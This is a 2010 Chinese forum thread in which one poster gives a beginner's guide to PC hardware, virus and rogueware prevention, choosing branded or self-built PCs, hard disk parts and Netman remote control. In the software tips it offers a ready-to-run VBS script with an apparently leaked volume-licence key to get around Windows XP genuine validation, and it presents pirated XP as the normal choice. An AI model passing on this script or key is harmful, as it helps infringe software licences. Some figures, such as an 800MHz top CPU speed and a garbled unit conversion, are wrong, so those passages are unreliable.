常用软件的安装:这个时候可以开始进行WINDOWS的旅程了,但是这个时候电脑内是空的,游戏,MP3,电影等等都需要从网上下载或者从其他地方拷贝,当然必备的软件也是不可少的,例如MP3播放器,电影播放器,上网要杀毒软件,常用聊天软件,下载软件等等.当然WINXP操作系统中自带的有播放器,但是功能比较单一,这些常用软件可以根据不同的需要来进行安装,例如不上网就不用装杀毒软件,不聊天就可以不装聊天软件等等.不听歌看电影也是可以不安装播放器的.这些常用软件都是在某些方面比操作系统自带的功能要更强大.
总结:看过上面两个部分的介绍,相信大家对于电脑的硬件和软件有了基本的了解,因为面向大众,所以说的比较简单通俗.
流浪●剑尊 - 2010-3-19 20:56:00
小知识:电脑怎么会中毒?怎样做好病毒的防范和预防?
答:了解完硬件和软件的基本知识后,现在说说电脑中毒,在电脑硬件中,有几个进口,只要把进口把住关,病毒是进不了你的电脑的,首先:上网,上网要通过网卡来传输数据,网络上什么都有,如果一不小心,就很容易中病毒.第二,光盘,某些盗版软件光盘和游戏光盘上携带有病毒,这种病毒是无法清除掉的,因为光盘数据是刻录或者压制在光盘上的,普通光盘属于只读光盘.第三,U盘或者MP3播放器,某些病毒可以通过U盘或者USB接口的存储设备传输,如果U盘不小心在别的电脑上中了病毒,又插在没有病毒的电脑上,很容易感染病毒.最后,软盘,软盘通过软驱来进行病毒的传染,但是现在软驱基本上已经淘汰,所以就不多说了.
所以要预防病毒,首先要把好这几个进口,不上xxx,不浏览不健康的网页,上网要有杀毒软件,不随便的安装不了解的光盘软件或者光盘游戏,不随便借用别人的U盘传输数据,如果安装或者插U盘等USB设备的话,要养成扫描病毒的习惯,软驱基本上没人装了,这里就不说这个了.电脑没有病毒,只有完全断开这些电脑的进口,才可能完全的避免中毒的可能.
流浪●剑尊 - 2010-3-19 20:57:00
小知识:
1.
正版杀毒软件和盗版杀毒软件的区别是正版可以通过网络享受升级服务,而盗版则不能.
2.
所有病毒都是软件或破坏性程序,病毒简单分为蠕虫型病毒,破坏性病毒两种类型,蠕虫型病毒可以大量复制自己或者通过占用系统资源来拖慢系统的运行速度,造成电脑运行速度越来越慢直至操作系统瘫痪,破坏性病毒是通过破坏电脑中的操作系统文件,造成操作系统不能正常启动运行,或者是破坏电脑硬盘中的各种数据文件,造成硬盘中的各种文件无法正常使用.以前有种CIH病毒可以破坏主板的CMOS,造成主板的软件损坏,主机无法正常使用,但是现在的主板都增加了防范这种破坏CMOS软件的功能,可以这样说,现在的病毒已经不可能破坏硬件,只能破坏软件,包括硬盘分区的分区表,操作系统,各种软件,游戏,MP3,视频文件等等,前面已经说过,这些都是软件,大不了重新安装各种软件就可以了.
3.
“木马”是一种经过伪装的欺骗性程序,它通过将自身伪装吸引用户下载执行,从而破坏或窃取使用者的重要文件和资料.通过这个程序,可以盗取中木马电脑用户的各种资料,帐号,密码,通过网络自动发送到制造木马或者传播木马的邮箱或指定地点.一般木马针对性比较强,有些是盗游戏帐号密码的,有些是盗网银帐号密码的,有些是盗聊天软件的帐号密码的.
一旦中了木马,首先要断开网络连接,因为这样就是神仙也操纵不了你了,然后你可以耐心地去清除它。还有就是删除前做好备份,以防操作失误。
4.
恶意软件是介于病毒和正规软件之间的软件,又叫流氓软件。
流氓软件的分类
根据不同的特征和危害,困扰广大计算机用户的流氓软件主要有如下几类:
1、广告软件(Adware)
定义:广告软件是指未经用户允许,下载并安装在用户电脑上;或与其他软件捆绑,通过弹出式广告等形式牟取商业利益的程序。
危害:此类软件往往会强制安装并无法卸载;在后台收集用户信息牟利,危及用户隐私;频繁弹出广告,消耗系统资源,使其运行变慢等。
2、间谍软件(Spyware)
定义:间谍软件是一种能够在用户不知情的情况下,在其电脑上安装后门、收集用户信息的软件.危害:用户的隐私数据和重要信息会被“后门程序”捕获,并被发送给黑客、商业公司等。这些“后门程序”甚至能使用户的电脑被远程操纵,组成庞大的“僵尸网络”,这是目前网络安全的重要隐患之一。
3、浏览器劫持
定义:浏览器劫持是一种恶意程序,通过浏览器插件、BHO(浏览器辅助对象)、Winsock LSP等形式对用户的浏览器进行篡改,使用户的浏览器配置不正常,被强行引导到商业网站。危害:用户在浏览网站时会被强行安装此类插件,普通用户根本无法将其卸载,被劫持后,用户只要上网就会被强行引导到其指定的网站,严重影响正常上网浏览。
4、行为记录软件(Track Ware)
定义:行为记录软件是指未经用户许可,窃取并分析用户隐私数据,记录用户电脑使用习惯、网络浏览习惯等个人行为的软件。
危害:危及用户隐私,可能被黑客利用来进行网络诈骗。
例如:一些软件会在后台记录用户访问过的网站并加以分析,有的甚至会发送给专门的商业公司或机构,此类机构会据此窥测用户的爱好,并进行相应的广告推广或商业活动。
5、恶意共享软件(malicious shareware)
定义:恶意共享软件是指某些共享软件为了获取利益,采用诱骗手段、试用陷阱等方式强迫用户注册,或在软件体内捆绑各类恶意插件,未经允许即将其安装到用户机器里.危害:使用“试用陷阱”强迫用户进行注册,否则可能会丢失个人资料等数据。软件集成的插件可能会造成用户浏览器被劫持、隐私被窃取等。
6、其它
随着网络的发展,“流氓软件”的分类也越来越细,一些新种类的流氓软件在不断出现,分类标准必然会随之调整。
近日,一些“流氓软件”引起了用户和媒体的强烈关注。它们往往采用特殊手段频繁弹出广告窗口、危及用户隐私,严重干扰用户的日常工作、数据安全和个人隐私。这些软件在软件用户中引起了公愤,许多用户指责它们为“彻头彻尾的流氓软件”。
流氓软件是中国大陆对网络上散播的符合如下条件(主要是第一条)的软件的一种称呼:
采用多种社会和技术手段,强行或者秘密安装,并抵制卸载;
强行修改用户软件设置,如浏览器主页,软件自动启动选项,安全选项;
强行弹出广告,或者其他干扰用户占用系统资源行为;
有侵害用户信息和财产安全的潜在因素或者隐患;
未经用户许可,或者利用用户疏忽,或者利用用户缺乏相关知识,秘密收集用户个人信息、秘密和隐私。
这些软件也可能被称为恶意广告软件(adware)、间谍软件(spyware)、恶意共享软件(malicious shareware)。与病毒或者蠕虫不同,这些软件很多不是小团体或者个人秘密地编写和散播,反而有很多知名企业和团体涉嫌此类软件。
5.
电脑的启动过程简单的说就是:电脑主机开机后首先电源开始供电,主板开始进行一系列的程序运行,这一系列程序是在主板的CMOS里保存并固化的,检测各种硬件的基本工作条件正常后,交给操作系统来接管各种硬件的控制和操作,加载硬件驱动后进入操作系统界面,启动过程中出现的黑屏白字的英文过程是主板CMOS的程序,进入图形界面就是操作系统的接管.
答:每一款杀毒软件都是由2部分组成的,一部分是扫描杀毒部分,一部分是防毒预防部分,正版杀毒软件可以通过网络享受到定期的更新杀毒软件的这2个部分的数据库,而盗版软件则不可以,只能通过盗版杀毒软件的目前病毒库的版本来识别它所认识的病毒.正常情况下,开机后自动加载的是杀毒软件的防毒部分,也就是病毒防火墙,病毒防火墙在运行的时候,会占用系统资源,所以配置低的朋友会出现运行缓慢等现象.但是安装杀毒软件也不要以为一劳永逸了,记住,病毒永远都比杀毒软件快一步,杀毒软件只识别和清除它所认识的病毒,所以该中毒还是中毒,只有平时养成良好的上网习惯.
流浪●剑尊 - 2010-3-19 20:57:00
小知识:什么是U盘,MP3,MP3播放器,读卡器,存储卡?
答:U盘是采用USB接口的一种存储装置,里面的数据在关机的情况下还可以保存,类似于硬盘,采用的是电子技术,没有机械部分,但是容量一般比较小,最大为8GB,在WIN2000或更高的操作系统中可以自动识别.反复擦写可以达到10万次,是软驱软盘的替代产品,最大的弊端就是在WIN98操作系统中要安装驱动程序,而软驱则不用安装任何的驱动,所有的操作系统都可以识别.而软驱的淘汰跟他1.44MB的容量大小,可反复擦写最多50次,读写速度慢有关.
MP3是一种音频的压缩格式,简称MP3格式,任何的音频都可以压缩为MP3格式,网络上比较常见这种格式的歌曲.MP3压缩比跟音质有直接的关系,压缩比越高,音质越差.
MP3播放器是可以播放MP3格式和其他常见音频格式歌曲的播放器,是以前的随身听,随身CD的替代产品,现在绝大多数手机也带有MP3歌曲播放功能.
读卡器:是一种可以读取各种存储卡的设备,使用方法和U盘相似,一头是USB接口,另一头是各种存储卡的插槽.
存储卡:主要是数码相机和手机中应用,可以通过读卡器把存储卡内的各种数据转移或者复制到电脑的硬盘中.
流浪●剑尊 - 2010-3-19 20:58:00
组装机和品牌机:
这里简单说说品牌机和自己组装电脑的区别.强调一点,目前所有的品牌机都是组装机,只不过品牌机是大批量采购组装后经过测试,印上自己的品牌,然后利用自己的销售网络进行销售.这就是我在前面讲的CPU,内存颗粒,硬盘,显卡的GPU都是国外制造的的原因.
1.
稳定性方面:品牌机的配件采用大批量采购的方式,有自己独立的组装车间和测试车间,有自己的品牌理念.自己组装机没有良好的组装环境和测试环境,容易出现兼容性方面的问题.
2.
灵活性方面:品牌机的配置一般情况下不能更改或挑选余地小,而个人组装机完全可以根据自己的需要和经济条件来进行配置.
3.
价格方面:品牌机的价格比相同配置的组装机价格高,因为品牌价值在里面,还有售后服务,门面等等,越是大品牌的品牌电脑越是利润高,例如:5000元的品牌电脑厂家组装成本大约是4000元,剩下的1000元就是品牌价值,xxx,售后服务,经销商的利润等等,当然我们配的时候可能4000元下不来, 但是绝对不会超过4200元,因为人家是大批量采购,价格方面有优势, ,但是组装机的价格不包含xxx价钱,加税一般为4%,而品牌机的销售价格中包含xxx价格.
4.
售后服务方面:品牌机的售后服务一般是主要硬件3年,软件1年免费质保,而组装机的售后服务一般为软件3个月免费服务,当然适当超一点时间也是没关系的,硬件的质保根据你选择的硬件的品牌来决定质保时间,例如:CPU有3年保和1年保的,买3年就是3年保,买1年就是1年保,损耗品一般质保3个月.买品牌机就是买服务,买组装机就是实惠,品牌机的针对对象是公司和完全不懂电脑的人群,而组装机是针对有点电脑知识,而且还想买实惠的人群.
5.
附件方面:品牌机一般附带的有正版杀毒软件,正版操作系统(正版操作系统的价格都加在电脑中),什么网校的学习卡等等,而品牌机则没有这些配件.一般组装机送鼠标垫,防尘罩,排插等等.
6.
售后服务的速度方面:一般品牌机的售后服务为1-2工作日内上门服务,而组装机的售后服务速度就要看你配机选择商家的规模和保证了.一般情况下的速度比品牌机的上门速度快.
7.
使用方面:如果你购买的品牌机附带有正版操作系统,那这个操作系统的价格都加在品牌电脑销售价格中了,现在的品牌机一般情况下也不附带正版操作系统了,价格太高了,要知道正版的WINXP专业版操作系统的价格是2000元左右,所以和组装机一样,目前装的都是盗版WINXP操作系统,使用上面没有区别
8.
宣传方面:品牌机一般以某样突出配件做噱头,.开发出自己的一些特色功能,都是针对少数固定人群的,没有什么实际用途.而模糊概括一些比较重要的参数.
9.
外观方面:品牌机的外观比较好看,品牌机主要是靠外观搭配的协调来吸引消费者的眼球,某些品牌机利用小机箱来减小主机的体积,这样不利于主机内的散热,短时间没问题,时间长了就会出现散热方面的问题.
总结:
品牌机的针对对象就是办公,企事业单位,对价格不是太敏感,要xxx,性能不是太高,
购买品牌机主要看重的是品牌机的稳定性、质量以及服务,附带的正版操作系统一般都是同类型价格最便宜的,例如XP操作系统分为专业版和家庭版,家庭版的价格要便宜于专业版,又是大批量采购,所以操作系统的价格不会超过800元,但是这个价格已经加到品牌机的销售价格中了.而普通家庭用户都会选择盗版的XP专业版操作系统,一般光盘价格为3-10元,跟正版的使用没区别.售后服务时间长,.现在绝大多数的品牌机已经不附带这种正版操作系统了,购买的时候销售商会帮客户安装好盗版的操作系统和常用软件的.一定要选择有知名度的品牌电脑,售后服务网络比较发达,本来就是用钱买的售后,如果当地只有销售没有售后或者售后不方便,那就失去购买品牌机的意义了.
组装机的针对对象是普通家庭用户,
主要看中低价、随意组装和升级方便,根据选择配件的质量好坏和组装人员的水平来决定电脑的稳定性,建议购买组装机的用户最好找懂行的人员一起陪同选择和购买配件,一旦确定一台电脑的配置后,拿配置单多转转,分别让各个商家给你报价,根据商家的规模最终确定在哪个商家进行配机.配机的过程中要防止商家私自调货,以旧代新,可以随身携带几个测试软件,当面测试,一般经过测试软件测试1小时或者更长时间没有任何故障后就可以放心的回家了.回家的头7天是全免费调换,电脑24小时不关机,在不上网的情况下运行自己熟悉的大游戏或者其他软件进行长时间的测试,进过几天长时间的无故障运行,基本上就可以放心硬件是没有问题的了.
流浪●剑尊 - 2010-3-19 20:58:00
进阶篇小知识:什么是OEM?答: OEM(Original Equipment Manufacture)的基本含义是定牌生产合作,俗称“贴牌”。就是品牌生产者不直接生产产品,而是利用自己掌握的“关键的核心技术”负责设计和开发新产品,控制销售和销售“渠道”,而生产能力有限,甚至连生产线、厂房都没有,为了增加产量和销量,为了降低上新生产线的风险,甚至为了赢得市场时间,通过合同订购的方式委托其他同类产品厂家生产,所订产品低价买断,并直接贴上自己的品牌商标。这种委托他人生产的合作方式即为OEM,承接这加工任务的制造商就被称为OEM厂商,其生产的产品就是OEM产品。
OEM的特征就是:技术在外,资本在外,市场在外,只有生产在内小知识:硬盘的组成答: 从物理角度来说,硬盘主要由硬盘的盘片、磁头、传动部件、主轴、PCB底层电路板以及接口等组成。1)
硬盘盘片 硬盘在电脑系统中的作用主要是用来存储数据,而数据最终是存放在硬盘的盘片上,而硬盘的其他部分都是为其服务的。硬盘盘片一般采用硬质合金制造,表面上被涂上了磁性物质,通过磁头的读写,将数据记录在其中。由于盘片在硬盘中要高速旋转,所以硬盘的盘片表面都十分光滑,而且耐磨度都很高,多为铝合金制作,IBM等公司也使用过其他的材料来制作盘片,如玻璃质材等。通常一个硬盘由若干张盘片叠加而成,目前一张盘片的单碟容量已经达到惊人的133GB,而总容量高达400GB。 硬盘盘片由于需要高速运转,通常都是密封在硬盘中的,此时如果有灰尘或细小的杂物沾在盘片上,将会对硬盘造成巨大的伤害,所以我们绝对不要私自拆卸完好的硬盘。2)
硬盘磁头 如果我们把硬盘的盘片比喻成记录内容的纸张,那么磁头就相当于写字的笔。硬盘磁头是用线圈缠绕在磁芯上制成的,当硬盘盘片高速运转的时候,磁头能够通过电流的变化去感应盘片上记录的内容。最早的硬盘磁头是读写合一的,但是对于读写两种不同的速度无法取得一个平衡点,于是IBM提出将读写操作分开,这就是之后的各项异性磁阻技术(AMR)。 和我们用手写字不一样,我们写字的时候笔尖是要接触到纸张的。而磁头在读写的时候虽然和盘片的距离相当近(0.1~0.3μm),但是不能靠在盘片上,这就要求盘片旋转的时候要非常平稳,磁头和盘片的相对距离要保持得当。当硬盘在工作的时候,要尽量不去剧烈晃动它,否则很可能会造成磁头碰撞盘片从而缩短硬盘的寿命。3)
传动部件 硬盘的传动部件包括传动手臂以及传动轴,在传动手臂的末端安放了硬盘磁头,进行对数据的读写。当硬盘没有工作时,传动部件将磁头停放在硬盘盘片的最内圈的起停区内。开始工作时,硬盘中固化在ROM芯片中的程序开始对硬盘进行初始化,工作完成后,主轴开始高速旋转,由传动部件将磁头悬浮在盘片0磁道处待命,当有读写命令时,传动手臂以传动轴为圆心摆动,将磁头带到需要读写数据的地方去。如果出现突然断电的情况,硬盘的反力矩弹簧会自动将磁头带回起停区,防止盘片刮伤。4)
硬盘主轴 目前硬盘的众多参数中,硬盘转速是一项重要的指标,而转速的高低则由硬盘的主轴决定。目前台式机硬盘的主流转速是7200转/分钟,笔记本硬盘主流转数是5400转/分钟,转速越高的硬盘读写速度也就会越快。但是随着硬盘转速的提升,带来的则是硬盘稳定性下降和巨大的噪声。目前硬盘的主轴都采用了“液态轴承马达”,这种马达使用的是黏膜液油轴承,以油膜代替滚珠,有效避免了由于滚珠摩擦而带来的高温和噪音。同时,这种技术对于硬盘防震也有很大的帮助,对于突如其来的震动,油膜能够很好地吸收。因此,采用该技术的硬盘在运转中能够承受几十至几百G的外力。由此一来,硬盘的寿命也有了进一步的提升。5)
PCB电路底板 在硬盘的反面,是一块PCB电路板,上面有很多的芯片和分立元件,通过这些元器件,我们才能控制盘片转动、控制磁头读写我们需要的数据并通过接口传递出去。在硬盘的底板上,我们需要注意其中三个比较重要的芯片,它们分别是: 硬盘的主控制芯片。这个芯片在整个底板上块头最大,正方形身材,主要负责数据交换和数据处理。 缓存芯片。在主控制芯片附近,会有一个长方形的芯片,这种芯片和内存使用的芯片差不多,在这里主要负责的是给数据提供暂存空间,提高硬盘的读写效率。目前主流硬盘的缓存芯片容量有2MB和8MB,最大的达到16MB,缓存容量越大,硬盘性能越好。 硬盘驱动芯片。这个芯片也是正方形模样,比主控芯片要小很多,主要负责硬盘的马达以及主轴马达的转动。6)
硬盘接口 硬盘的接口是指硬盘和外界的联系方式,这里包括电源接口和数据传输接口。硬盘的工作需要外接电源,IDE硬盘普遍采用的是4Pin的电源接口,接口截面类梯形,有效地防止了接口的反插。另外一种是SATA电源接口,这种接口使用在SATA硬盘上。 目前最常见的数据传输接口有PATA(IDE)、SATA、SCSI三种,前两种接口方式主要应用在个人PC上,而SCSI接口则主要使用在服务器领域。 PATA(Parallel ATA)接口采用的是并行传输模式,该标准由Intel和Quantum(昆腾)公司提出,利用40Pin 80芯的排线连接主板和硬盘,速率从最早的DMA33,DMA66到目前的DMA100、DMA133,并口的速率基本上走到了极限。SATA(Serial ATA)接口采用的是串行传输模式,Intel放弃了对DMA133的支持,而提出了SATA接口标准,这种模式能够在较少的位宽下获得高带宽,因为带宽=位宽×频率,所以SATA在频率上下功夫,照样能够获得较高的带宽。目前SATA1.0已经达到了150MB/s的速率,今后还有300MB/s的速率出现。由于SATA信号线少,之间的干扰少,所以硬盘在传输过程中出现错误率也会较少,提高了硬盘的工作效率。SCSI接口的硬盘价格较高,主要使用在服务器和工作站中,部分高端主板也集成了SCSI控制器,目前主流的主板要支持SCSI设备必须购买SCSI卡才行,所以其使用的范围受到了一定的制约。
流浪●剑尊 - 2010-3-19 20:58:00
电脑使用中的几个误区:
1.
正确开关机,养成正常的开关机习惯是很有必要的,在XP操作系统下,按一下电脑开关键就自动进行开机,一直等到完全进入桌面系统前不要进行任何的操作,除非有问题进不了系统,正常情况下都是可以进入桌面的.如果想关机,有些朋友不喜欢按正常顺序,点开始,关闭计算机,关闭,那也可以通过再按电脑主机上的开关键一下,电脑会自动进入关机的程序,需要保存的系统会有提示,只有等到主机完全关机后,再把排插的电彻底关闭,在电脑不用的时候,要养成把排插的电彻底关闭的好习惯.
2.
电脑主机在运行中的时候,不要随意踢碰主机和强行断电,主机中其他东西不怕踢碰因为毕竟外面有机箱的保护,但是其中的硬盘就不一样了,因为硬盘在运行中,就是轻微的磕碰都有可能造成硬盘的坏道,而在电脑正常关机后,硬盘的磁头自动归位到”码头”部位,就不那么娇贵了,硬盘出现坏道,如果是逻辑坏道,系统在开机的过程中会自动进入磁盘检测过程,经过磁盘检测没有问题后清除坏道就可以正常使用,而一旦出现物理坏道,系统就没有办法修复,会造成磁盘检测过程中死机或长时间检测不过去的现象,只能用其他软件来进行屏蔽,物理坏道只能屏蔽,不能修复,就是屏蔽,也是短时间屏蔽,坏道会逐步扩散,及早就要做好重要数据的备份,准备换硬盘吧.
3.
PS2接口的键盘鼠标的安装一定要在关机的情况下进行,不然很容易造成主板上键盘鼠标口的损坏.USB接口的键盘鼠标可以在开机的情况下进行热插拔.
4.
电脑不怕用,但是怕长时间不用,不管是品牌机还是组装机,都是用的,只要前期经过长时间的硬件稳定测试后没有问题,一般情况下出现的问题都是软件方面的问题,出现软件方面的问题不要害怕,中毒的杀毒,操作系统有问题的重新安装操作系统,电影MP3歌曲有问题的重新下载,游戏有问题的重新安装.如果长时间不用,电脑就会出现例如风扇长时间不转出现的润滑不畅的现象,所有的电子产品都是这样,一直正常使用没有问题,但是如果长时间不使用,等再用的时候就会出现各种各样的故障.
5.
选择CRT显示器的朋友最好把屏幕的刷新率调整为75或85HZ,可以有效的避免屏幕闪烁的现象,而LCD显示器的朋友则最好把屏幕的刷新率调整为最低的50或者60HZ,因为LCD的原理和CRT的不一样,至于屏幕保护功能2种显示器都可以选择关闭,长时间不用,还是关闭掉显示器的电源则最为保险,还省电.
6.
光驱中不要长时间的放一张光盘,这样开机既可以节省检测光盘的过程,还可以有效避免光驱的长时间待机状态,类似于普通家用VCD机,从你的光盘一放进去,里面的机械部分就开始不停的运转了,随时等待你的操作,只有在你退出光盘的时候,机械部分才会完全的停止旋转工作而进入出仓阶段.
7.
下载软件BT是硬盘杀手,现在BT下载软件,电影,游戏已经很普通了,现在的BT软件默认的设置中都会对硬盘的读写进行保守的设置,正常使用是完全可以避免损坏硬盘的,相对损害硬盘来说,其实一款质量差的电源远远要比这种常见BT下载软件对硬盘的损害大的多。
流浪●剑尊 - 2010-3-19 21:00:00
个人出配机单的一点思路:
本人配机的思路如下:
例如一个普通家庭用户,预算最高5000元,要求,19寸液晶显示器,双核CPU,效果好一点的音箱,键盘鼠标普通光电,要个摄像头,首先确定机箱+电源为260元,机箱电源单配,任意的38度空机箱80元,大品牌质量好的电源180元左右,内存选择2GB的DDRII 667,价格为2*140元,音箱选择250元左右的中档音箱.键盘鼠标140元.硬盘没有大的需要,选择160GB 串口硬盘,价格咨询当地为410元,光驱没什么特殊要求就是DVD光驱,价格150元,19寸液晶显示器最后经过购买人的挑选选择三星,1900元,普通摄像头:80元,现在剩余的钱还有:5000-260-280-250-140-410-150-1900-80=1530元,那么这1530元就是3大主件的钱了,平均每样的预算在500元左右,CPU考虑:双核AMD 4000+,价格410元,考虑到用户是普通家用上网,玩游戏,游戏要求不是很高,选择了悍马的主板和采用散热片的8500GT,最后合计的价格没有超过5000元.:首先要准确的知道有多少的预算来配置电脑,然后把相对价格比较明朗的排除,特殊需要的排除,最后剩下的钱是CPU+主板+显卡的钱.硬件中电源是普通用户不太注重的,但是拥有一款好的电源反而是电脑正常工作的最基本条件,别的方面可以省,电源不能省,机箱就是个铁壳子,好坏是不影响电脑性能的.CPU没有假货,只有风扇和散热片存在质量好坏,CPU分xxx的水货和正规进口,区别就是享受的质保时间不同.内存只要是品牌内存,尽量选择个便宜的,能通过长时间稳定测试就OK了,不一定大品牌的内存就一定适合你而且还容易存在假货.硬盘没什么说的,看你什么用途,容量从常见的80—250GB不等,型号新的硬盘应用的新技术更多一些,性能更好.硬盘分为串口(SATA)和并口(PATA)两种接口,未来的趋势是SATA硬盘,但是如果经常去别人家拷贝电影的话,还是弄个并口的硬盘吧,要知道SATA接口出来没几年,别人的主板上不一定就有SATA接口.音响的区别主要在价格,通常100元以下是个档次,100-200是个档次,200元以上是个档次,音质方面有明显的区别,键盘鼠标可以根据自己的喜好来进行配置.光驱一般都是配DVD光驱,平时没有大的用途,但是遇到系统瘫痪的时候,就需要用光驱来进行操作系统的维护和安装,所以还是配一个的比较好.主板和显卡的型号比较多,选择的时候要多看网上的相关评测,根据自己的经济能力首先确定几款主板然后配机的时候临时确定,这2个方面是最不能省的,一定要选择口碑好,大品牌的厂家的产品,网上一般都有报价,跟当地的售价肯定由区别,所以适当的放宽50-100元,本人的意见,买大厂的低端产品不如买2线厂家的中端产品,同一种芯片组,主要看做工.选择INTER的CPU,一般选择采用INTER的主芯片组的主板,选择AMD的CPU,一般选择NVIDIA或者ATI的芯片组,VIA和SIS的芯片组面对的是低端用户或者品牌机,性能虽然也不错,但是要知道显卡的主要厂家都是ATI和NVIDIA的显示芯片,毕竟一个厂家的芯片,兼容性可能更好一些.主板尽量采用标准的大板,而不要采用小板的,对于要求不高而最后3大件的预算过小的情况下,还可以考虑CPU+集成显卡的主板,要知道现在的集成显卡已经可以满足普通上网用户的普通需要,这样就可以准确的控制预算.
小提示:现在绝大多数家庭用户都是把电脑放在卧室中.所以对于要求不高的普通用户,静音也是很关键的.电脑要静音,首先要考虑电脑中有几个零件在转,CPU风扇,电源风扇,硬盘,机箱风扇,显卡风扇.除了硬盘的声音没有方法完全屏蔽掉,其他的CPU风扇,电源风扇,机箱风扇,显卡风扇都是在配机的时候要考虑好的,主板的主芯片要尽量采用散热片散热和热管散热的,CPU选择发热量小的,普通用户是不考虑超频的,CPU风扇要越大越好,风扇叶子要多,这样在转速慢的情况下出风量还可以满足CPU的散热.电源风扇也是这样,现在的静音电源都是采用12CM的大风扇,可以大大减低风扇运行时的噪音和满足电源的散热需要,当然电源没有一点声音也不是没有可能,TT的有款热管电源,运行完全是零噪音.机箱风扇的目的辅助机箱散热,如果机箱内的温度不高,那就可以不安装,至于显卡,只要在满足自己使用要求的前提下,尽量选择静音版本的,比如采用散热片或者热管方式等被动散热方式的.目前据我所知,CPU散热器,显卡,电源都有热管版本的,这样你的电脑在开机后只有硬盘在转,声音当然可以忽略不计了,但是这是要付出金钱的代价的.
小提示:
1.配机后一定要保存好各种驱动盘.例如主板,显卡等等的原装驱动盘,当系统出现问题需要重新安装驱动程序的时候就能派上用途了,要知道这种原装驱动可能不是性能最好的驱动版本,但是肯定是最稳定的版本,如果一旦丢失,就需要根据主板显卡的的厂家,型号去厂家的官方网站下载相对应的驱动版本,普通家庭用户还是不要随意使用没有经过微软认证过的驱动版本.
2.驱动程序的安装顺序,有些GHOST安装系统后会自动安装好常见的驱动程序,虽然也可以正常使用,但是有可以因为驱动版本不合适等等原因造成系统的不稳定,建议最好还是采用原装驱动光盘上的驱动程序来进行驱动程序安装.
安装驱动的顺序一般为主板主芯片组驱动,不管是什么主芯片组,一定能够要首先安装主芯片组的驱动,其次安装最新的DX9.0C(DX9.0C 全称为DirectX9.0c。是微软公司的多媒体技术,很多运行于Windows 环境的新游戏需要DirectX。DirectX包含了对Direct3D、DirectDraw、DirectPlay、DirectSound、DirectInput等显示、声音以及系统的重要升级,是软硬件的接口。最新的版本是9.0C),然后开始正常安装显卡的驱动,最后是周边设备,例如网卡,声卡等等的驱动程序.
3.XP操作系统的正版验证破解,复制下列文字(蓝色文字部分)保存为*.VBS后双击运行,就可以破解XP操作系统的正版验证,这下上网升级补丁就没有任何问题了.
ON ERROR RESUME NEXT
Dim VOL_PROD_KEY
if Wscript.arguments.count<1 then
VOL_PROD_KEY=InputBox("本程序将自动替换你当前 Windows 的序列号,通过微软验证完全正版。"&vbCr&vbCr&"序列号(OEM版无效,默认版本为 XP VLK):","Windows XP 序列号自动更换器","MRX3F-47B9T-2487J-KWKMF-RPWBY")
if VOL_PROD_KEY="" then
Wscript.quit
end if
else
VOL_PROD_KEY = Wscript.arguments.Item(0)
end if
VOL_PROD_KEY = Replace(VOL_PROD_KEY,"-","") 'remove hyphens if any
for each Obj in GetObject("winmgmts:{impersonationLevel=impersonate}").InstancesOf("win32_WindowsProductActivation")
result = Obj.SetProductKey (VOL_PROD_KEY)
if err = 0 then
Wscript.echo "OK!去微软验证吧GOGOGO~."
end if
if err <> 0 then
Wscript.echo "替换失败!输入的 CD-KEY 与当前的版本不匹配。"
Err.Clear
end if
流浪●剑尊 - 2010-3-19 21:01:00
什么是内存双通道?
答:随着高端处理器的推出,处理器对内存系统的带宽要求越来越高,内存带宽成为系统越来越大的瓶颈.内存厂商只要提高内存的运行频率,就可以增加带宽,但是由于受到晶体管本身的特性和制造技术的制约,内存频率不可能无限制地提升,所以在全新蹬内存研发出来之前,双通道内存技术就成了一种可以有效地提高内存带宽的技术。它最大的优势在于只要更改内存的控制方式,就可以在现有内存的基础上带来内存带宽的提升。从理论指标来看,双通道内存技术具有相当的优势。双通道DDR400的理论带宽为6 4GB/s,和英特尔的前端总线为800MHz的P4处理器及i865、i875芯片组完全匹配。前端总线为800MHz的P4平台选用双通道DDR400,与双通道的内存控制和管理机制及高带宽有很大关系。
双通道内存技术原理?答:双通道内存技术其实就是双通道内存控制技术,它能有效地提高内存总带宽,从而适应新的微处理器的数据传输、处理的需要。双通道DDR有两个64bit内存控制器,双64bit内存体系所提供的带宽等同于一个128bit内存体系所提供的带宽。
双通道体系包含了两个独立的、具备互补性的智能内存控制器,两个内存控制器都能够并行运作。例如,当控制器B准备进行下一次存取内存的时候,控制器A就在读/写主内存,反之亦然。两个内存控制器的这种互补“天性”可以让有效等待时间缩减50%,因此双通道技术使内存的带宽翻了一翻。它的技术核心在于:芯片组(北桥)可以在两个不同的数据通道上分别寻址、读取数据,RAM可以达到128bit的带宽。
流浪●剑尊 - 2010-3-19 21:03:00
以下将是个别软件的使用介绍"篇"
流浪●剑尊 - 2010-3-19 21:05:00
网络人:知道IP就能实现远程控制(一)
网络人(Netman)远程控制软件,除了能穿透内网、防火墙,通过杀毒软件安全认证外,还有一个小功能,只要知道对方IP,就能远程控制对方电脑。现在我就给大家讲讲这是怎么实现的。
点击下载:网络人 首先是下载、安装网络人软件:
要实现远程控制,需要双方电脑都要安装网络人软件。安装后,运行软件,会看到软件上有个本机IP/ID,和控制密码。这时可以通过QQ,索要对方电脑上的IP和控制密码,输入到“远程IP”、“控制密码”框内。
然后点击连接,就可以远程方面对方电脑桌面、操作对方电脑的鼠标、键盘了!
小提示:出于安全考虑,软件的控制密码是在每次启动时随机生成的,所以每次重启软件后,控制密码都会改变。建议大家两边都注册一个免费会员ID,设置固定的控制密码,这样只要知道对方ID,和控制密码,就算远程电脑前没有人,也可以随时连接远方电脑,再也不用每次都索要对方IP和控制密码了。而且ID比IP好记得多。
流浪●剑尊 - 2010-3-20 20:38:00
电脑入门知识精华版
流浪●剑尊 - 2010-3-20 20:40:00
电脑入门知识精华版(让你全面认识电脑)(一)
我们先来认识下电脑的几大件
从外面看,电脑由显示器、机箱、键盘、鼠标等组成。现在电脑一般多媒体化了,所以你还可以看到音箱,其中,机箱可以说是电脑的关键部分,其他部件通过各种连线与它联接起来,它的“肚子”里面就复杂了,我们只要大概知道里面放着CPU、内存条和硬盘等东西就行了。它们的作用嘛,CPU是中央处理器的缩写,担负着运算的功能。衡量一台电脑配置高低的最主要指标就是CPU的运行频率,频率越高,运行速度越快。现在CPU的最高频率已经达到800MHz。内存和硬盘的作用是存储数据,只是内存的读取速度更快,但保存的数据在关机后就会消失,所以内存只用来暂存数据,而安装的程序要全部放在硬盘上。表示存贮容量的单位有B(Byte的简写,字节)、kB(千字节)、 M(读作“兆”)和G等。换算关系为:1G=103M=106kB=109B。什么,1000M比1G要大?我倒~!@#$%^&* 。
机箱的前部面板
